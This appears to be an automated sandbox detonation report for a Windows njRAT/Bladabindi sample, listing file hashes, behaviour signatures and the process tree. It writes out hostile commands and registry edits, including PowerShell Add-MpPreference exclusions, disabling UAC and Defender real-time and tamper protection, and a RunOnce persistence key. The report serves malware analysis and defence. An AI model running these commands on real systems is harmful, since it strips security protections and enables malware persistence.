SHA1 8502f83f952b07a1fdf0e6d70fb9808ebb14195d
SHA256 0833790b15fb1c86c4263ea85368896b71d58ad6f6497cc6ac97b52b20114c10
SHA512 85e0171b694c18e8bd44c77fdb441f34f3c535fff5c0ca1925660957188369c8b88c6740c2e5b785cd39d990f5f8e42102736dae03acf158f4657ff52f519beb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3066c5fda9cb7ef23c35380b45f3a583
SHA1 ffc39b2adad1b8456d4fc3f0562aa4fd359bb7e0
SHA256 ed1fb092e9ad637e4a9bbb4ffb0ef9d9f420752ef2d0593bd3eb2ef4bc731720
SHA512 c726decb49b1fb0d55909f4b1d395da8a1a7a1982a044bcbedb21521247e33ef55632527b8585dd210fb0bd2198dd5c37c63f579d0ba8153b9a9b750d3ca6dc0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3b763c0f171168322352b7c2d44f0363
SHA1 a462f3abb60f9d9183261a7a8b561841fa0d5acc
SHA256 50f12d1c7f69b71bac2d15bc83e87f94e1d2f8539df2aad2b45c84ef4d1c0693
SHA512 a8ed2a2419d723ac97fc442351e8cfde2f528f9f80273fe29d21c21c166d31fb083d7da60c93dbf804ae23ee57e50c13bd78e7056250506fa4adaf28c7ba6342

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ef0ff7fab3698e36f71ff2e5104a0cbb
SHA1 b5f931fe2ab8c7f52cdc72c94dd2bfceab266845
SHA256 4ac50ebcf55d17aba4e6e8a2ef02a518b65400940fcf472d8f9ff7c83cde42c3
SHA512 a4fbb43a7fc248ea358d8b0b93dc84629ec0716549da8e91e109e17fd4a2800be9f7f14f83c052dbaf8f881f76f83dc9737f8e6116845fb656c37b659dd6ef59

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5cc6f319006e65e83cf5a83452ef1462
SHA1 deab3bf72efa0c849b5dfd2b384e3889001d0178
SHA256 73669629d189346d53326de4715f65fdcd571bfb3681f97c78f195c2869b782e
SHA512 5042589a9d5d8b7b9fc8319bc989d0b0353b54877361e663d5301cca69f5d5683db7f90ec7218a51de35f4f61d4cf283feef634a8e296b9a93c8cd5c51650129

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a3c8348583151adec3f6b7c3669c886
SHA1 9d9ace9ebb4fe417bbc72f5e5a6c4441d8746c60
SHA256 56bbea00d94ce1668accae9d334c775b324d6349cebde9439c4d03632bae825e
SHA512 9ed0f7a06acbdff7ef7dceb0f4debb7bd5237107901fff074e3a77cb417ba89a3d0e8dfaa2ad86bc5e38f2b587f043872bfcdfc123c938c6bcb6ef5e65ea8eb6

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EdgeBrowser.exe.log

MD5 7119a280abc0c4b5f21a0932887a54ac
SHA1 aa369248ea6d293fe56a5ed669e29cd897911f84
SHA256 418398bab7542ba692fe00d88d6de06c65f73b9376567c5190a007f7a211c91f
SHA512 b11111d017e86445be9c41d2ca4a6e147cf2d8ae31663bb0772e2eaaf3a7a906285ab78a708d9122a29f8aa2519e80b12e050ad4538867e2b5d3edb0fe21039f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bd76416a086fedc4c0e2abaaf74525fb
SHA1 27992c39e25de4d7d49a4762a25ced1160bcd521
SHA256 bc8bcf7709b2b5c4a0b32047c2e1be3f7b2492ac892ea75745c84cf999ffb8c6
SHA512 2fe2afdace104e4328b479909459dc248484537c8af59b57201986562f353c99a7dac0e4e68bdccc85fd0e26c547f49e30a8b40ea7e970fd88077c20f48716a1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 74d7095da2833bb0dff8c00536ca95c1
SHA1 8ba1052306aa360adcaee670666e2c42044b0018
SHA256 9f088611b35f28d77a330c0aa545269a25eecc9411566cd33fa2f7d72a671244
SHA512 b82a5b5fdd7703740305514f09adbdb22caab6d0b36e49867fa470932f0ef11ad78c4defdcb0342642202ec432ec281864dd3096e82ddf84a8db8895620e751b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8c4217af9f07bded779a75b814d05119
SHA1 fa8c23e1a873815a740c31487b058fac7efdddc8
SHA256 5c3c39026f031c34978cf4ca3a32b568b54f8103ceda5580969537b196d21671
SHA512 ca8cd0eea48f541160943cb0379c3c71de9b9425769299ad0c17daa101b24882b05d472ab93d9e025968ab91ea038561223ecc506dd53a42bdf60a185c38b786

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2002a1cb17c93d10191f253e2f29b73b
SHA1 3befbcd3100b5c64e5171e6837389c24dc8ed8f0
SHA256 719bf57a58c0ce85fdfce8f61ea17c234f4765792b37d070d3bbb56604c75866
SHA512 04faf60afc929a0c0ab86c2bc08a9f3365b7706b615b3136d9abf7be04f18477a5d82d34cfd0622cc9dfe42773ba57a02a964eb65aa962b515e5a68f46605018

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-27 05:47

Reported

2024-01-27 05:50

Platform

win7-20231215-en

Max time kernel

150s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\EdgeBrowser.exe = "0" N/A N/A

njRAT/Bladabindi

trojan njrat

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\EdgeBrowser.exe = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1268429524-3929314613-1992311491-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1268429524-3929314613-1992311491-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1268429524-3929314613-1992311491-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\EdgeBrowser.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Token: SeImpersonatePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2056 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe
PID 1680 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe
PID 2056 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
PID 2056 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2524 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 1528 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe
PID 2056 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe C:\Windows\SysWOW64\cmd.exe
PID 2524 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2524 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe" /SpecialRun 4101d8 1680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force

C:\Users\Admin\AppData\Local\Temp\8811a9c1-0f37-47e5-a1ae-1917bc2ce83e\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\8811a9c1-0f37-47e5-a1ae-1917bc2ce83e\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8811a9c1-0f37-47e5-a1ae-1917bc2ce83e\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

C:\Users\Admin\AppData\Local\Temp\8811a9c1-0f37-47e5-a1ae-1917bc2ce83e\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\8811a9c1-0f37-47e5-a1ae-1917bc2ce83e\AdvancedRun.exe" /SpecialRun 4101d8 1528

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 1

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 1

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

